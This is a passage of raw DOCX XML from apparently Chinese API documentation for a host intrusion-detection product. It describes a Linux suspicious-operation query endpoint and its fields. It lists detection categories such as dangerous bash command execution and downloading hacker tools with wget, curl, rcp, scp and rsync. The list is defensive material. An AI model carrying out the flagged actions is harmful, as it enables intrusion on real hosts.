        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047E79CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031326CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"errorCode"</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errorMessage"</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10C4804F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>返回部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="1248"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1759A65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D7B1783" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5641F200" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEDDC0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="521F5701" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1E27C535" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6550384A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518C6E69" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="137491D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A0B4A21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76C54769" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="入侵检测"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="132"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>入侵检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09517A17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="可疑操作"/>
      <w:r>
        <w:t>可疑操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C56A0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="查询结果-1"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51820FD9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux可疑操作上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A6C83C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C5573" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/shelllog/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73470AB2"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298"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4234F89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7723A6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4437AFC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="275F32C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A2B825E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B2444C2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053255D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7712B791" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24193FEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77B5F927" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="566E2BA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="596E760E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>logTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB3DE09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7859EF22" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D37F2E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>上报时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74CA3B27" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B8DBE85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>auditStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67D2E322" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="206081FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3167C3AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>审核状态：1-未审核；2-审核通过；3-审核未通过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="445FD32D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D4C44AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41F35DEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3066B546" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F44FB0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>可疑操作类型，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="可疑操作类型">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>可疑操作类型</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4386BABF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B353AB1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34196DDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E98C81F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56422B5F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命令内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="482EC297" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B7060F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62702AAA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0421A4F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19C225BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="76E92331" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44EBE928" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginUser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="295C7641" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B316378" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C1D3DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="078B7E61" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68F7F633" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BACF5D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056027DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E59B81" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="79C2BEAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D7C12E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BEDDC37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F2621F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F0ED0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>操作主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F19BA1B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>可疑操作类型字典表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="446"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6B0072A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9056DC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40507E0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F632208" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3AE715" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DBFBA83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未命中规则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06CE4A2A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="491D8338" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C3FCDFE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bash危险命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="78467FA4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32FFEC46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F180A0E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Wget下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="069B1263" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="439BBE80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48E7FB28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>curl下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0115A644" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061D262D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="274E4765" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rcp下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C3952B0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36983780" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0895F735" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>scp下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0358AEFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E26311C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A36CCB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rsync下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0341B6A3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C3D5128" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
